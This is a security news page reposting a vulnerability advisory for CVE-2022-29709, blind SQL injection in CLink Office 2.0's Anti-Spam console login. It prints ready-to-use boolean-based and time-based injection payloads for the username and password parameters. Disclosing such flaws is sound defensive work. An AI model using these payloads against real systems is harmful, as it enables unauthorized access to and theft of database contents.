Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-29709: CLink Office 2.0 SQL Injection ≈ Packet Storm

CommuniLink Internet Limited CLink Office v2.0 was discovered to contain multiple SQL injection vulnerabilities via the username and password parameters.

CVE
#sql#vulnerability#auth
# Exploit Title: Multiple blind SQL injection vulnerabilities in in CLink Office 2.0 Anti-Spam management console # Date: 30 Mar 2022 # Exploit Author: Erwin Chan, Stephen Tsoi # Vendor Homepage: https://www.communilink.net/ # Softwar: CLink Office # Version: 2.0 # Tested on: CLink Office 2.0 Anti-Spam management consoleVulnerability details below:Affected URL: /cgi-bin/anti-spam.plAffected Parameter: username, passwordPayload example:- boolean-based blind SQLi* ' AND 1234=(SELECT (CASE WHEN (TRUE) THEN 1234 ELSE (SELECT 1111 UNIONSELECT 2222) END))-- LMgx**' AND 1234=(SELECT (CASE WHEN (FALSE) THEN 1234 ELSE (SELECT 1111 UNIONSELECT 2222) END))-- LMgx*- time-based blind SQLi*' OR SLEEP(5)-- LMgx*As a result, we were able to dump database data on application. I recommenddevelopment team to perform input sanitization on affected parameters.Please lets me know if you have any questions. Thanks.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907